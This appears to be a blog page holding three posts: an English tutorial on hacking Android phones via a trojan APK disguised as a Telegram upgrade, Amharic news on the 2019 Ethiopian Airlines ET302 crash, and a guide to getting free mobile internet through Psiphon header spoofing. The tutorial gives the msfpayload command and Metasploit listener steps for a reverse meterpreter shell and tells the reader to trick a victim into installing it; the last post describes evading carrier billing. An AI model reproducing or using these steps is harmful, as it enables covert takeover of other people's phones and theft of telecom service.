Ad

Thursday, March 14, 2019

😈How to Hack Telegram Using Kali (Remotely)😈


This is a tutorial explaining how to hack android phones &
Telegram with Kali.
(Still ,you may already know about this)


Step 1:

Open a terminal, and make a Trojan .apk
You can do this by typing :

'msfpayload android/meterpreter/reversetcp
LHOST=95.108.142.138 R > /root/Desktop/Telegram.apk'
(replace LHOST with your own IP)

You can also hack android on WAN i.e. through Interet by
using your Public/External IP in the LHOST and by port
forwarding (ask me about port forwarding if you have
problems in the comment section)

Step 2: Open Another Terminal:

Open another terminal until the file is being produced.
Load metasploit console, by typing : 'msfconsole'

Step 3: Set-Up a Listener:

After it loads(it will take time), load the multi-handler
exploit by typing :

'use exploit/multi/handler'

Set up a (reverse) payload by typing :

'set payload android/
meterpreter/reversetcp'

To set L host type :

 'set LHOST 192.168.0.4'

 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

At last type: exploit to start the listener.

Copy the application that you made (Telegram.apk) from
the root folder, to you android phone.
send file ....

Let the Victim install the Upgrader app(as he would think
it is meant to upgrade some features on his phone)

However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from
the security settings of the android phone to allow the
Trojan to install.
And when he clicks Open...

Step 5: BOOM!
There comes the meterpreter prompt


Tuesday, March 12, 2019


ወይዘሮ ከበበች ዛሬ በአዲስ አበባ በአውሮፕላኑ በተከሰከሰበት ስፍራ ቢሾፍቱ ድረስ በመሄድ እባካችሁ ልጄን ስጡኝ እባካችሁ ልጄን እያሉ በሀዘን እዛው የሚቆፍሩትን የተበታተነውን ቁርጥ ራጭ ሬሳ የሚያወጡትን የቀይ መስቀል ሰራተኞችን አስለቅሰዋል።

እናት ከበደች እባካችሁ ልጄን እያሉ መሬቱን ሲቆፍሩ ታይተዋል የታለች እሷ የታለች እሷ እባካችሁ ልያት እያሉም ሲያለቅሱ

አይ እናት ሀዘንሽ በዛ

ነብስሽ ይማር እህታችን

ምንጭ፦ Reuters 

Monday, March 11, 2019

# ትረፊ__ያላት__ነፍስ
********************

ግሪካዊው መንገደኛ ከትላንቱ የኢትዮጵያ አየር መንገድ አደጋ በእድል ተረፈ።

አንቶኒስ ማቭሮፖሎስ የተባለው ግሪካዊ መንገደኛ "ሁለት ደቂቃ በመዘግየቴ ምክንያት አውሮፕላኑ ስላመለጠኝ ከሞት መትረፍ ችያለሁ" ሲል በፌስ ቡክ አካውንቱ ገልጿል።
ትኬቱን እና የእለቱን ሁኔታ በፌስቡክ አካውንቱ ላይ አያይዞ የገለጸው ግሪካዊው ተጓዥ፤ ሁለት ደቂቃ ብቻ በመዘግየቱ ለምን ለመግባት እከለከላለሁ በሚል ከአየር መንገዱ ሰራተኞች ጋር ጭቅጭቅ ፈጥሮ እንደነበረና አደጋው ሲነገረው ግን በእድለኛነቱ ተገርሞ መመለሱን አስታውቋል።

ግሪካዉው ባላረፍድ ኖሮ 157ኛው ሟች እሆን ነበር ሲልም ነው እድለኛነቱን የገለጸው። ምን ተሰማችሁ ?????
"ወዳጀ ባጣሀው ነገር አትቆጭ ያ ነገር
አጥፊህ ሊሆን ይችላል " ሼር


ብሄራዊ የሃዘን ቀን
የኢፌዴሪ የህዝብ ተወካዮች ምክር ቤት ዛሬ መጋቢት 2 ቀን 2011 ዓ.ም ብሄራዊ የሃዘን ቀን አወጇል።

• ባራክ ኦባማና ሚሼል ሀዘናቸውን ገልፀዋል
(Tweet by Barack Obama on Twitter)
* የአውሮፕላኑን መረጃ የያዘው ጥቁር ሳጥን (Black Box) ተገኝቷል
* የኢትዮጵያ አየር መንገድ ያሉትን ቦይንግ 737 - 8 –MAX አውሮፕላኖች ከበረራ ውጭ ማድረጉን አስታውቋል
* ቻይና በቦይንግ 737 ማክስ 8 የሚደረጉ በረራዎችን ማገዷን ለዓለም አስታውቃለች
***






የኢፌዴሪ የህዝብ ተወካዮች የምክር ቤቱ ጽሕፈት ቤት በላከው መግለጫ በአደጋው ህይወታቸውን ላጡ ኢትዮጵያውያን እና የውጭ ሐገር ዜጎች ዛሬ መጋቢት 2 ቀን 2011 አ.ም የአንድ ቀን ብሄራዊ የሐዘን ቀን እንዲታወጅ በሰንደቅ አላማ አዋጅ ቁጥር 654/2001/ በአዋጅ ቁጥር 863/2006 እንደተሻሻለ አንቀጽ 22 ንዑስ አንቀጽ (2) መሰረት መወሰኑን አስታውቋል።
ስለሆነም የሪፐብሊኩ ሰንደቅ አላማ መጋቢት 2 ቀን 2011 በመላው የአገሪቱ ግዛቶች፣ በኢትዮጵያ መርከቦች እና በውጭ ሐገር በሚገኙ ኤምባሲዋች የቆንስላ ጽህፈት ቤቶች ዝቅ ብሎ የሚውለበለብ ይሆናል ብሏል።
ምክር ቤቱ ብሄራዊ የሀዘን ቀኑን ያወጀው ትናንት ንብረትነቱ ኢትዮጵያ አየር መንገድ የሆነ ቦይንግ 737 አውሮፕላን ተከስክሶ የ157 ሰዎች ህይወት ማለፉን ተክትሎ ነው፡፡
***


በተያያዘም ዜና ~ የኢትዮጵያ አየር መንገድ ያሉትን ቦይንግ 737 - 8 –MAX አውሮፕላኖች ከበረራ ውጭ ማድረጉን አስታውቋል
አየር መንገዱ እንዳስታወቀው ትላንት አደጋ የደረሰበት የበረራ ቁጥር ET 302 ቦይንግ 737 - 8 –MAX ምክንያቱ በይታወቅም ለግዜው ተመሳሳይ ስሪት ያላቸውን አውሮፕላኖች ከበረራ ውጭ ለማድርግ ወስኗል።
በአደጋው ዙርያ ተጨማሪ መረጃ ሲኖረው ይፋ እንደሚያደርግም ገልጿል።
በተመሰሳይ የቻይና አየር መንገድም ቦይንግ 737 - 8 –MAX አውሮፕላኖቹን ከበረራ ውጪ ማድረጉን ገልጿል።
***
ቻይና በቦይንግ 737 ማክስ 8 የሚደረጉ በረራዎችን አገደች
ንብረትነቱ የኢትዮጵያ አየር መንገድ የሆነ ቦይንግ 737 አውሮፕላን ትላንት መከስከሱን ተከትሎ የቻይና አየር መንገዶች በቦይንግ 737 ማክስ 8 የሚደረጉ በረራዎችን እንዲያቆሙ የሃገሪቱ ኤቪዬሽን ተቆጣጣሪ መስሪያ ቤት አስታወቀ።

ማንኛውም የንግድ በረራ የሚያካሂዱ የቻይና አየር መንገዶች ከዛሬ ጠዋት 12 ሰአት ጀምሮ አውሮፕላኑን መጠቀም አይችሉም ተብሏል።

አውሮፕላኑ ከቦሌ አለም አቀፍ አውሮፕላን ማረፊያ የተነሳው ጠዋት 2፡38 ሲሆን ከ6 ደቂቃ በኋላ ከአብራሪዎቹ ጋር ይደረግ የነበረው ግንኙነት ተቋርጦ ከደቂቃዎች በኋላ መከስከሱ ተረጋግጧል።
ቦይንግ 737 ማክስ 8 ከተባለው አውሮፕላን ጋር በተያያዘ አደጋ ሲከሰት ባለፉት ስድስት ወራት ይህ ሁለተኛው ነው።

የዘርፉ ባለሙያዎች አደጋው በምን ምክንያት እንደተከሰት ለማወቅ ጊዜው በጣም ገና ነው ያሉ ሲሆን ባለፈው ጥቅምት ''የላየን'' አየር መንገድ ንብረት የሆነ ተመሳሳይ አውሮፕላን ተከስክሶ 189 ሰዎች ህይወታቸው ማለፉ ይታወሳል።

የቻይናው ሲቪል ኤቪየሽን ባለስልጣን በሰጠው መግለጫ በአጭር ጊዜ ውስጥ አንድ የአውሮፕላን ሞዴል አደጋ ሲደርስበት በቸልታ ማለፍ ይከብደኛል ብሏል።



ቻይና ውስጥ ከ90 በላይ ቦይንግ 737 ማክስ 8 አውሮፕላኖች አገልግሎት የሚሰጡ ሲሆን ይህኛው ሞዴል ቦይንግ በቅርቡ በፈንጆቹ 2017 ዓ.ም. ነበር ለገበያ ያቀረበው።

የአውሮፕላኑ አምራች ኩባንያ ቦይንግ በበኩሉ በተፈጠረው አደጋ እጅግ ማዘኑን በመግለጽ የቴክኒክ ድጋፍ የሚሰጥና የአደጋውን መንስኤ ለማጣራት በሚደረገው ስራ ላይ እርዳታ የሚሰጥ ቡድን እንደሚልክ አስታውቋል።

የምርመራ ሂደቱም የሚመለከታቸው የኢትዮጵያ መስሪያ ቤቶች ከቦይንግ ባለሙያዎችና ከአሜሪካ የትራንስፖርት ደህንነት መስሪያ ቤት ጋር በመተባበር የሚካሄድ እንደሆነ ተገልጿል።
የቻይና አየር መንገዶች የቦይንግ 737 ማክስ 8 አውሮፕላንን መጠቀም የሚችሉት የኤቪዬሽን መስሪያ ቤቱ ወደፊት በሚሰጠው መግለጫ መሰረት እንደሆነ አስታውቋል።

በትናንትናው ዕለት በቦይንግ 737 በረራ ቁጥር ET302 የ157 ሰዎችን ህይወት በቀጠፈው አሰቃቂ አደጋ ከሟቾቹ መካከል 8ቱ ቻይናዊያን መሆናቸው ታውቋል።

የቀድሞው የአሜሪካ ፕሬዝዳንት ባራክ ኦባማ እና ባለቤታቸው ሚሼል ኦባማ በተከሰከሰው የኢትዮጵያ አውሮፕላን ህይወታቸውን ላጡ ቤተሰቦች እና ወዳጅ ዘመዶች ሀዘናቸውን በትዊተር ገጻቸው ገልጸዋል።

ትናንት ከአዲስ አበባ ወደ ናይሮቢ ሲያቀና ከተነሳ ከስድስት ደቂቃዎች በኋላ የተከሰከሰውን የኢትዮጵያ ዓየር መንገድ ንብረት የሆነውን አውሮፕላን የመረጃ ሳጥን ለማግኘት በአደጋ ስፍራው ቁፋሮ ውጤት አስገኝቷል።



የአውሮፕላኑን መረጃ የያዘው ጥቁር ሳጥን (Black Box) ተገኝቷል፡፡

"Black box" flight recorder found after Ethiopian Airlines crash in which 157 people died -
# U.S. Embassy Addis Ababa
Today we join all Ethiopians in their national day of mourning over the loss of life in yesterday's tragic accident involving Ethiopian Airlines flight 302. We stand with the Ethiopian people and have offered our support to Ethiopian Airlines and the Ethiopian government.

Sunday, March 10, 2019






How to use free internet in ethiopia
[በኢትዮጵያ ነፃ ኢንተርኔት ለመጠቀም ለምፈልጉ🇪🇹🇪🇹🇪🇹🇪🇹🇪🇹🇪🇹🇪🇹🇪🇹🇪🇹🇪🇹🇪🇹]


Globe free internet using Psiphon dzebb handler march  2019✌️

1.0 load balance or use promo

2. Android phone 3G/4G/LTE supported

3. Download Psiphon Handler Dzebb

Procedure
:
1. Turn On Mobile Data
.
2. Install and open Psiphon handler app.

3. Follow these handler settings:

Check the 'Remove Port', and set:
Proxy Type: HTTP
Custom Header: X-Online-Host
Proxy Server: m.globe.com.ph
Real Proxy Type: Default
Real Proxy Server: 185.65.206.123
Real Proxy Port: 80

4. Tap on 'Save' button.

5. Now you can see the connection manager, and it will ask you to whether 'Use Psiphon Browser Only or Tunnel Whole Device'. Select Tunnel Whole Device option.

6. Now an Attention pop up window will ask you to Create VPN connection with Psiphon.

 ALLOW it by checking 'I trust this application' and pressing 'OK'.

7. Wait for a few moment for the application to be connected.
       

 After getting connected, minimize Psiphon handler and start browsing, downloading, streaming and gaming.

8. Done! Psiphon is completely free VPN service with no daily limit, so you can surf unlimited internet using your Globe SIM.
     
     

The recommended usage using this Globe internet trick is 1-2GB per day to avoid slowing down of speed.